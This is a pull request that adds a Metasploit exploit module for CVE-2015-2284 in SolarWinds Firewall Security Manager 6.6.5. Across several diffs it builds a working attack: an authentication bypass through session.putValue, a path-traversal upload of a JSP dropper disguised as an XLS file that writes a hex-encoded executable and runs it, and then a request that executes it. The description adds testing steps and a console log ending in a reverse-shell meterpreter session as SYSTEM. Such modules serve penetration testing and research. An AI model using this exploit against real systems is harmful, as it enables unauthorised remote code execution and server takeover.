### PR TITLE
Add CVE-2015-2284: Solarwinds Firewall Security Manager 6.6.5 Session Handling Vulnerability

### DIFF
--- a/modules/exploits/windows/http/solarwinds_fsm_userlogin.rb
+++ b/modules/exploits/windows/http/solarwinds_fsm_userlogin.rb
@@ -10,6 +10,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
 
   def initialize(info={})
     super(update_info(info,
@@ -19,30 +20,33 @@ class Metasploit3 < Msf::Exploit::Remote
         6.6.5. The first vulnerability is an authentication bypass via the Change Advisor interface
         due to a user-controlled session.putValue API in userlogin.jsp, allowing the attacker to set
         the 'username' attribute before authentication. The second problem is that the settings-new.jsp
-        file will only check the 'username' attribute before authorizing the 'uploadFile' action, which
-        can be exploited and allows the attacker to upload a fake xls file to the server, and results
-        in arbitrary code execution.
+        file will only check the 'username' attribute before authorizing the 'uploadFile' action,
+        which can be exploited and allows the attacker to upload a fake xls host list file to the
+        server, and results in arbitrary code execution under the context of SYSTEM.
 
         Depending on the installation, by default the Change Advisor web server is listening on port
         48080 for an express install. Otherwise, this service may appear on port 8080.
+
+        Solarwinds has released a fix for this vulnerability as FSM-v6.6.5-HotFix1.zip. You may
+        download it from the module's References section.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
           'rgod',  # Original discovery
+          'mr_me <steventhomasseeley[at]gmail.com>', # https://twitter.com/ae0n_
           'sinn3r' # Metasploit
         ],
       'References'     =>
         [
+          ['CVE', '2015-2284'],
           ['OSVDB', '81634'],
+          ['ZDI', '15-107'],
+          ['URL', 'http://downloads.solarwinds.com/solarwinds/Release/HotFix/FSM-v6.6.5-HotFix1.zip']
         ],
-      'Payload'        =>
-        {
-          'BadChars' => "\x00",
-        },
       'DefaultOptions'  =>
         {
-          'RPORT'    => 48080
+          'RPORT'    => 48080 # Could be 8080 too
         },
       'Platform'       => 'win',
       'Targets'        =>
@@ -78,14 +82,22 @@ class Metasploit3 < Msf::Exploit::Remote
       fail_with(Failure::NotVulnerable, 'Target does not appear to be a Solarwinds Firewall Security Manager')
     end
 
+    # Stage 1 of the attack
+    # 'admin' is there by default and you can't delete it
     username = 'admin'
     print_status("Auth bypass: Putting session value: username=#{username}")
     sid = put_session_value('admin')
     print_status("Your SID is: #{sid}")
 
+    # Stage 2 of the attack
+    exe = generate_payload_exe(code: payload.encoded)
     filename = "#{Rex::Text.rand_text_alpha(5)}.jsp"
-    malicious_file = get_jsp_payload
-    print_status("Uploading file: #{filename}")
+    # Because when we get a shell, we will be at:
+    # C:\Program Files\SolarWinds\SolarWinds FSMServer\webservice
+    # So we have to adjust this filename in order to delete the file
+    register_files_for_cleanup("../plugins/com.lisletech.athena.http.servlets_1.2/jsp/#{filename}")
+    malicious_file = get_jsp_payload(exe, filename)
+    print_status("Uploading file: #{filename} (#{exe.length} bytes)")
     upload_exec(sid, filename, malicious_file)
   end
 
@@ -93,9 +105,53 @@ class Metasploit3 < Msf::Exploit::Remote
   private
 
 
+  # Returns a write-stager
+  # I grabbed this from Juan's sonicwall_gms_uploaded.rb module
+  def jsp_drop_bin(bin_data, output_file)
+    jspraw =  %Q|<%@ page import="java.io.*" %>\n|
+    jspraw << %Q|<%\n|
+    jspraw << %Q|String data = "#{Rex::Text.to_hex(bin_data, "")}";\n|
+
+    jspraw << %Q|FileOutputStream outputstream = new FileOutputStream("#{output_file}");\n|
+
+    jspraw << %Q|int numbytes = data.length();\n|
+
+    jspraw << %Q|byte[] bytes = new byte[numbytes/2];\n|
+    jspraw << %Q|for (int counter = 0; counter < numbytes; counter += 2)\n|
+    jspraw << %Q|{\n|
+    jspraw << %Q|  char char1 = (char) data.charAt(counter);\n|
+    jspraw << %Q|  char char2 = (char) data.charAt(counter + 1);\n|
+    jspraw << %Q|  int comb = Character.digit(char1, 16) & 0xff;\n|
+    jspraw << %Q|  comb <<= 4;\n|
+    jspraw << %Q|  comb += Character.digit(char2, 16) & 0xff;\n|
+    jspraw << %Q|  bytes[counter/2] = (byte)comb;\n|
+    jspraw << %Q|}\n|
+
+    jspraw << %Q|outputstream.write(bytes);\n|
+    jspraw << %Q|outputstream.close();\n|
+    jspraw << %Q|%>\n|
+
+    jspraw
+  end
+
+  # Returns JSP that executes stuff
+  # This is also from Juan's sonicwall_gms_uploaded.rb module
+  def jsp_execute_command(command)
+    jspraw =  %Q|<%@ page import="java.io.*" %>\n|
+    jspraw << %Q|<%\n|
+    jspraw << %Q|try {\n|
+    jspraw << %Q|  Runtime.getRuntime().exec("chmod +x #{command}");\n|
+    jspraw << %Q|} catch (IOException ioe) { }\n|
+    jspraw << %Q|Runtime.getRuntime().exec("#{command}");\n|
+    jspraw << %Q|%>\n|
+
+    jspraw
+  end
+
+
   # Returns a JSP payload
-  def get_jsp_payload
-    'evil inside'
+  def get_jsp_payload(exe, output_file)
+    jsp_drop_bin(exe, output_file) + jsp_execute_command(output_file)
   end
 
 
@@ -108,7 +164,7 @@ class Metasploit3 < Msf::Exploit::Remote
     )
 
     unless res
-      fail_with(Failure::Unknown, 'The connection timed out while setting the session value')
+      fail_with(Failure::Unknown, 'The connection timed out while setting the session value.')
     end
 
     get_sid(res)
@@ -128,13 +184,14 @@ class Metasploit3 < Msf::Exploit::Remote
     res = upload_file(sid, filename, malicious_file)
 
     if !res
-      fail_with(Failure::Unknown, 'The connection timed out while uploading the malicious file')
+      fail_with(Failure::Unknown, 'The connection timed out while uploading the malicious file.')
     elsif res && res.body.include?('java.lang.NoClassDefFoundError')
       print_status("Payload being treated as XLS, indicates a successful upload.")
     else
-      print_status("Unsure of a successful upload, but we're going to try to execute anyway")
+      print_status("Unsure of a successful upload.")
     end
 
+    print_status("Attempting to execute the payload.")
     exec_file(sid, filename)
   end
 
@@ -143,6 +200,10 @@ class Metasploit3 < Msf::Exploit::Remote
   # By default, the file will be saved at the following location:
   # C:\Program Files\SolarWinds\SolarWinds FSMServer\plugins\com.lisletech.athena.http.servlets_1.2\reports\tickets\
   def upload_file(sid, filename, malicious_file)
+    # Put our payload in:
+    # C:\Program Files\SolarWinds\SolarWinds FSMServer\plugins\com.lisletech.athena.http.servlets_1.2\jsp\
+    filename = "../../jsp/#{filename}"
+
     mime_data = Rex::MIME::Message.new
     mime_data.add_part(malicious_file, 'application/vnd.ms-excel', nil, "name=\"file\"; filename=\"#{filename}\"")
     mime_data.add_part('uploadFile', nil, nil, 'name="action"')
@@ -163,7 +224,12 @@ class Metasploit3 < Msf::Exploit::Remote
 
 
   # Executes the malicious file and get code execution
+  # We will be at this location:
+  # C:\Program Files\SolarWinds\SolarWinds FSMServer\webservice
   def exec_file(sid, filename)
+    send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'fsm', filename)
+    )
   end
 
 

--- a/modules/exploits/windows/http/solarwinds_fsm_userlogin.rb
+++ b/modules/exploits/windows/http/solarwinds_fsm_userlogin.rb
@@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     username = 'admin'
-    print_status("Putting session value: username=#{username}")
+    print_status("Auth bypass: Putting session value: username=#{username}")
     sid = put_session_value('admin')
     print_status("Your SID is: #{sid}")
 
@@ -127,8 +127,12 @@ class Metasploit3 < Msf::Exploit::Remote
   def upload_exec(sid, filename, malicious_file)
     res = upload_file(sid, filename, malicious_file)
 
-    unless res
+    if !res
       fail_with(Failure::Unknown, 'The connection timed out while uploading the malicious file')
+    elsif res && res.body.include?('java.lang.NoClassDefFoundError')
+      print_status("Payload being treated as XLS, indicates a successful upload.")
+    else
+      print_status("Unsure of a successful upload, but we're going to try to execute anyway")
     end
 
     exec_file(sid, filename)

--- a/modules/exploits/windows/http/solarwinds_fsm_userlogin.rb
+++ b/modules/exploits/windows/http/solarwinds_fsm_userlogin.rb
@@ -19,8 +19,8 @@ class Metasploit3 < Msf::Exploit::Remote
         6.6.5. The first vulnerability is an authentication bypass via the Change Advisor interface
         due to a user-controlled session.putValue API in userlogin.jsp, allowing the attacker to set
         the 'username' attribute before authentication. The second problem is that the settings-new.jsp
-        file will only check the 'username' attribute for 'uploadFile' action's authorization, which
-        can be exploited and allows the attacker to upload a malicious file to the server, and results
+        file will only check the 'username' attribute before authorizing the 'uploadFile' action, which
+        can be exploited and allows the attacker to upload a fake xls file to the server, and results
         in arbitrary code execution.
 
         Depending on the installation, by default the Change Advisor web server is listening on port
@@ -42,7 +42,6 @@ class Metasploit3 < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'EXITFUNC' => "none",
           'RPORT'    => 48080
         },
       'Platform'       => 'win',
@@ -53,37 +52,115 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'     => false,
       'DisclosureDate' => "Mar 13 2015",
       'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, "Base FMS directory path", '/'])
+      ], self.class)
   end
 
 
   # Returns a checkcode that indicates whether the target is FSM or not
   def check
+    res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'fsm', 'login.jsp'))
+
+    if res && res.body =~ /SolarWinds FSM Change Advisor/i
+      return Exploit::CheckCode::Detected
+    end
+
+    Exploit::CheckCode::Safe
   end
 
-
-  # Creates an arbitrary username by abusing the server's unsafe use of session.putValue
-  def put_session_value(value)
-  end
-
-
-  # Uploads a malicious JSP file and then execute it
-  def upload_exec(filename, malicious_file)
-  end
 
   # Exploit/run command
   def exploit
     unless check == Exploit::CheckCode::Detected
-      print_error("Target does not appear to be a Solarwinds Firewall Security Manager")
-      return
+      fail_with(Failure::NotVulnerable, 'Target does not appear to be a Solarwinds Firewall Security Manager')
     end
 
     username = 'admin'
-    print_status("Putting session value: #{username}")
-    put_session_value('admin')
+    print_status("Putting session value: username=#{username}")
+    sid = put_session_value('admin')
+    print_status("Your SID is: #{sid}")
 
     filename = "test.jsp"
     malicious_file = ''
     print_status("Uploading file: #{filename}")
-    upload_exec(filename, malicious_file)
+    upload_exec(sid, filename, malicious_file)
   end
+
+
+  private
+
+
+  # Creates an arbitrary username by abusing the server's unsafe use of session.putValue
+  def put_session_value(value)
+    res = send_request_cgi(
+      'uri'      => normalize_uri(target_uri.path, 'fsm', 'userlogin.jsp'),
+      'method'   => 'GET',
+      'vars_get' => { 'username' => value }
+    )
+
+    unless res
+      fail_with(Failure::Unknown, 'The connection timed out while setting the session value')
+    end
+
+    get_sid(res)
+  end
+
+
+  # Returns the session ID
+  def get_sid(res)
+    cookies = res.get_cookies
+    sid = cookies.scan(/(JSESSIONID=\w+);*/).flatten[0] || ''
+    sid
+  end
+
+
+  # Uploads a malicious file and then execute it
+  def upload_exec(sid, filename, malicious_file)
+    res = upload_file(sid, filename, malicious_file)
+
+    unless res
+      fail_with(Failure::Unknown, 'The connection timed out while uploading the malicious file')
+    end
+
+    exec_file(sid, filename)
+  end
+
+
+  # Uploads a malicious file
+  # By default, the file will be saved at the following location:
+  # C:\Program Files\SolarWinds\SolarWinds FSMServer\plugins\com.lisletech.athena.http.servlets_1.2\reports\tickets\
+  def upload_file(sid, filename, malicious_file)
+    mime_data = Rex::MIME::Message.new
+    mime_data.add_part(malicious_file, nil, nil, "name=\"file\"; filename=\"#{filename}\"")
+    mime_data.add_part('uploadFile', nil, nil, 'name="action"')
+
+    proto = ssl ? 'https' : 'http'
+    ref = "#{proto}://#{rhost}:#{rport}#{normalize_uri(target_uri.path, 'fsm', 'settings-new.jsp')}"
+
+    send_request_cgi(
+      'uri'      => normalize_uri(target_uri.path, 'fsm', 'userlogin.jsp'),
+      'method'   => 'POST',
+      'vars_get' => { 'action' => 'uploadFile' },
+      'ctype'    => "multipart/form-data; boundary=#{mime_data.bound}",
+      'data'     => mime_data.to_s,
+      'cookie'   => sid,
+      'headers'  => { 'Referer' => ref }
+    )
+  end
+
+
+  # Executes the malicious file and get code execution
+  def exec_file(sid, filename)
+  end
+
+
+  # Overrides the original print_status so we make sure we print the rhost and port
+  def print_status(msg)
+    super("#{rhost}:#{rport} - #{msg}")
+  end
+
 end
+

--- a/modules/exploits/windows/http/solarwinds_fsm_userlogin.rb
+++ b/modules/exploits/windows/http/solarwinds_fsm_userlogin.rb
@@ -83,14 +83,20 @@ class Metasploit3 < Msf::Exploit::Remote
     sid = put_session_value('admin')
     print_status("Your SID is: #{sid}")
 
-    filename = "test.jsp"
-    malicious_file = ''
+    filename = "#{Rex::Text.rand_text_alpha(5)}.jsp"
+    malicious_file = get_jsp_payload
     print_status("Uploading file: #{filename}")
     upload_exec(sid, filename, malicious_file)
   end
 
 
   private
+
+
+  # Returns a JSP payload
+  def get_jsp_payload
+    'evil inside'
+  end
 
 
   # Creates an arbitrary username by abusing the server's unsafe use of session.putValue
@@ -134,14 +140,14 @@ class Metasploit3 < Msf::Exploit::Remote
   # C:\Program Files\SolarWinds\SolarWinds FSMServer\plugins\com.lisletech.athena.http.servlets_1.2\reports\tickets\
   def upload_file(sid, filename, malicious_file)
     mime_data = Rex::MIME::Message.new
-    mime_data.add_part(malicious_file, nil, nil, "name=\"file\"; filename=\"#{filename}\"")
+    mime_data.add_part(malicious_file, 'application/vnd.ms-excel', nil, "name=\"file\"; filename=\"#{filename}\"")
     mime_data.add_part('uploadFile', nil, nil, 'name="action"')
 
     proto = ssl ? 'https' : 'http'
     ref = "#{proto}://#{rhost}:#{rport}#{normalize_uri(target_uri.path, 'fsm', 'settings-new.jsp')}"
 
     send_request_cgi(
-      'uri'      => normalize_uri(target_uri.path, 'fsm', 'userlogin.jsp'),
+      'uri'      => normalize_uri(target_uri.path, 'fsm', 'settings-new.jsp'),
       'method'   => 'POST',
       'vars_get' => { 'action' => 'uploadFile' },
       'ctype'    => "multipart/form-data; boundary=#{mime_data.bound}",

--- a/modules/exploits/windows/http/solarwinds_fsm_userlogin.rb
+++ b/modules/exploits/windows/http/solarwinds_fsm_userlogin.rb
@@ -1,0 +1,89 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Solarwinds Firewall Security Manager 6.6.5 Client Session Handling Vulnerability",
+      'Description'    => %q{
+        This module exploits multiple vulnerabilities found in Solarwinds Firewall Security Manager
+        6.6.5. The first vulnerability is an authentication bypass via the Change Advisor interface
+        due to a user-controlled session.putValue API in userlogin.jsp, allowing the attacker to set
+        the 'username' attribute before authentication. The second problem is that the settings-new.jsp
+        file will only check the 'username' attribute for 'uploadFile' action's authorization, which
+        can be exploited and allows the attacker to upload a malicious file to the server, and results
+        in arbitrary code execution.
+
+        Depending on the installation, by default the Change Advisor web server is listening on port
+        48080 for an express install. Otherwise, this service may appear on port 8080.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'rgod',  # Original discovery
+          'sinn3r' # Metasploit
+        ],
+      'References'     =>
+        [
+          ['OSVDB', '81634'],
+        ],
+      'Payload'        =>
+        {
+          'BadChars' => "\x00",
+        },
+      'DefaultOptions'  =>
+        {
+          'EXITFUNC' => "none",
+          'RPORT'    => 48080
+        },
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          ['Solarwinds Firewall Security Manager 6.6.5', {}]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => "Mar 13 2015",
+      'DefaultTarget'  => 0))
+  end
+
+
+  # Returns a checkcode that indicates whether the target is FSM or not
+  def check
+  end
+
+
+  # Creates an arbitrary username by abusing the server's unsafe use of session.putValue
+  def put_session_value(value)
+  end
+
+
+  # Uploads a malicious JSP file and then execute it
+  def upload_exec(filename, malicious_file)
+  end
+
+  # Exploit/run command
+  def exploit
+    unless check == Exploit::CheckCode::Detected
+      print_error("Target does not appear to be a Solarwinds Firewall Security Manager")
+      return
+    end
+
+    username = 'admin'
+    print_status("Putting session value: #{username}")
+    put_session_value('admin')
+
+    filename = "test.jsp"
+    malicious_file = ''
+    print_status("Uploading file: #{filename}")
+    upload_exec(filename, malicious_file)
+  end
+end


### PR DESCRIPTION
This module exploits multiple problems against Solarwinds Firewall Security Manager 6.6.5. The first one is an authentication bypass due to the improper use of session.putValue, allowing the attacker to set the "username" attribute. The second problem is that the fileUpload action will only check the "username" attribute before authorizing the upload resource, which can be abused to upload a malicious JSP payload, and this will result in arbitrary code execution under the context of SYSTEM.
## To prepare for testing
- [x] A server-class Windows host, such as: Windows Server 2003 or later (including SP2), Server 2003 R2 or later (including SP2), Server 2008 or later (including SP2), Server 2008 R2 or later (including SP1), Server 2012.
- [x] Download Solarwinds Firewall Security Manager 6.6.5 and install it. The official download link is here: http://www.solarwinds.com/firewall-security-manager.aspx

The specific setup I have is this: Windows Server 2008 Enterprise SP2, with Solarwinds FSM 6.6.5 (build 6.6.5-115-20141020, express install). If you no longer have the vulnerable version, you can try my box instead in person.
## Testing
- [x] First, open a browser, and then go to: http://[IP]:48080/ to make sure you can actually connect to FSM's web interface. If port 48080 isn't there, then try 8080
- [x] Start msfconsole
- [x] Do: `use exploit/windows/http/solarwinds_fsm_userlogin`
- [x] Do: `set rhost [IP]`
- [x] Do: `run`
- [x] You should get a session like the following demo:

```
$ msfconsole
msf > use exploit/windows/http/solarwinds_fsm_userlogin 
msf exploit(solarwinds_fsm_userlogin) > set rhost 192.168.1.169
rhost => 192.168.1.169
msf exploit(solarwinds_fsm_userlogin) > run

[*] Started reverse handler on 192.168.1.64:4444 
[*] 192.168.1.169:48080 - Auth bypass: Putting session value: username=admin
[*] 192.168.1.169:48080 - Your SID is: JSESSIONID=1ehx5ezth8ktxu33axxaj8b40
[*] 192.168.1.169:48080 - Uploading file: YUbnH.jsp (73802 bytes)
[*] 192.168.1.169:48080 - Payload being treated as XLS, indicates a successful upload.
[*] 192.168.1.169:48080 - Attempting to execute the payload.
[*] Sending stage (785920 bytes) to 192.168.1.169
[+] Deleted ../plugins/com.lisletech.athena.http.servlets_1.2/jsp/YUbnH.jsp

meterpreter >
```

Note: The default password to login as admin is "admin", in case you're curious. The exploit does not need to use this though.
